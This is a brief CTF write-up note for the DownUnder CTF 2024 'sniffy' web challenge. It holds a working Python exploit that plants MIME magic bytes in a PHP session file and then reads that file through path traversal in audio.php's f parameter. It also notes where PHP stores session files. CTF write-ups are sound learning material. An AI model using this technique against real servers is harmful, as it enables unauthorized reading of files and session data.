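====== Mime Spoofing + php ======

Lessons learned from **DownUnder** CTF 2024: [WEB] sniffy

<code python>
import requests

# Fixed session ID, so the session file name on the server is known (sess_abcd).
cookies = {'PHPSESSID': 'abcd'}

# Try 0-3 bytes of padding so that one alignment of the repeated 'M.K.' tag
# lands on the offset the MIME check reads.
for i in range(4):
    # Send the theme value together with the session cookie.
    r = requests.get('http://localhost:8080/',
                     params={'theme': 'a' * i + 'M.K.' * 300},
                     cookies=cookies)
    # Request the session file through audio.php's f parameter.
    r = requests.get('http://localhost:8080/audio.php',
                     params={'f': '../../../../tmp/sess_abcd'})
    # Any status other than 403 means the file was served.
    if r.status_code != 403:
        print('found')
        print(r.text)
</code>

Note: Remember ''/tmp/sess_COOKIE'' (COOKIE is the PHPSESSID value, ''abcd'' in the script above).

  * https://github.com/waviq/PHP/blob/master/Laravel-Orang1/public/filemanager/connectors/php/plugins/rsc/share/magic.mime
  * https://www.garykessler.net/library/file_sigs.html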